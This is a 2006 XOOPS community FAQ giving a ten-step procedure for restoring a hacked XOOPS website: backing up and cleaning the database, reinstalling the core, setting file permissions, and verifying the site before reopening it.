My site has been hacked! What do I do?

Requested and Answered by JMorris on 2006/8/25 21:18:22

My site has been hacked! What do I do?

Here is a general outline on what to do if your site is hacked. The following assumes that you will also coordinate with your web hosting provider to determine whether the hacker compromised your site as a result of a vulnerability in the server, or through a vulnerability in your site. The following also assumes that you understand the basics of installation and configuration of XOOPS and any modules you have installed as well as the basic usage of a FTP program and phpMyAdmin.

1. Upload an index.html file stating that your site will be back soon and rename index.php to something like bak.index.php.

2. Download any non-xoops files that may need to be cleaned or restored. If your site uses altered XOOPS core files or modules, I hope you documented your changes.

3. Backup your database, being sure to use the "Drop table if exists" option in phpMyAdmin so you can restore your database later.

4. Delete all XOOPS files off of your web space, leaving only your temporary index.html.

5. Install a fresh copy of XOOPS just like a brand new site. Make sure you chmod your files and folders correctly after install! Also, to avoid incompatabilities, use the same version of XOOPS and all modules that was previously installed. You can always upgrade them after your initial restoration.

Folders: chmod 755
Exceptions: chmod 777* (may be able to use 755 or 775 on some hosting accounts)
cache/
templates_c/
uploads/

Files: chmod 644
Exceptions: chmod 444
mainfile.php
(I would also recommend ading an index.html with the following code in every directory that does not already have a index.html or index.php

<script>history.go(-1);</script>


6. Using a good editor, like Dreamweaver, vi, or Notepad+, search for any unusual javascript codes in your backed up database. A simple search for "javascript" should be sufficient.

7. After successfully reinstalling the base XOOPS system and uploading all the modules you had installed, restore your database from your cleaned backup.

8a. If all didn't go well, refer to the FAQ and Forum of this site to troubleshoot why your site didn't restore, then move onto 8b.

8b. If all went well, you can move onto verification. Before removing your temporary index.html, log into your site and immediately close it in your control panel and go through and thoroughly verify that your site has restored successfully, without any malicious code.

9. Once you've verified that your site has restored accurately and without malicious code, make a fallback backup of your database and files and upgrade your XOOPS install and modules to the latest stable versions. Then immediately perform a backup after everything has been verified to work properly.

10. Have 2 or three trusted members/friends log into the site and perform a final verification. If all is well, remove the temporary index.html and reopen your site.

HTH.

James

This Q&A was found on XOOPS Web Application System : http://xoops.org/modules/smartfaq/faq.php?faqid=621